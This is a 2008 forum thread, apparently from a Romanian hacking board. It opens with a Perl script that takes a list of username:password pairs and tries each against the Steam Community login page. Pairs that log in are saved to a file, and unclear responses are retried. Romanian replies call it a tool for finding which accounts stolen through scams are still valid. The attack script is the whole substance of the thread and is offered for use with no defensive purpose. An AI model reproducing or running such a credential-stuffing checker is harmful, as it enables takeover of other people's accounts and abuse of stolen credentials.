Proxenon Posted April 24, 2008 Report Posted April 24, 2008 #! /usr/bin/perluse LWP::UserAgent;my $ua = LWP::UserAgent->new( agent => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Alexa Toolbar Firefox/2.0.0.6 (Ubuntu-feisty)' );$ua->default_headers->push_header('Referer' => 'https://steamcommunity.com/');$ua->default_headers->push_header('Cookie' => 'timezoneOffset=7200,0');my $url = 'https://steamcommunity.com/';open(FILE, $ARGV[ 0 ]) or die("Could Not Open File!\n");my @lines = <FILE>;close(FILE);foreach $userpass (@lines){$userpass =~ s/^\s+//;$userpass =~ s/\s+$//;unless($userpass =~ m/(.*?)\.*?)(\ |$)/g){next;}my $user = $1;my $pass = $2;retry:print "Trying User: ".$user." \t\tPass: ".$pass."\n";my $response = $ua->post( $url, {'action' => 'doLogin','goto' => '','steamAccountName' => $user,'steamPassword' => $pass,'x' => int(rand(100)+750),'y' => int(rand(10)+390),}); #print $response->content; exit; if($response->code == 302) { print "Logged IN!\n"; open(FILE, '>>', 'steamworking.txt'); print FILE $userpass."\x0D\x0A"; close(FILE); } elsif(($response->is_success) && ($response->content =~ m/Incorrect.*login/gi)) { print "Fail, Next!\n"; next; } else { print "No Match, Retrying!\n"; goto retry; }} Quote
retard Posted April 29, 2008 Report Posted April 29, 2008 deci ... cu acest Exploit pot fura Conturi de steam ... ?? Quote
Vhaerun Posted April 29, 2008 Report Posted April 29, 2008 Nu e nici exploit si nu poti nici fura conturi. E un simplu mech ce incearca sa se logheze cu un user si o parola. E folosit pentru a afla care din conturile furate ( prin ceva scam ) sunt valide . Quote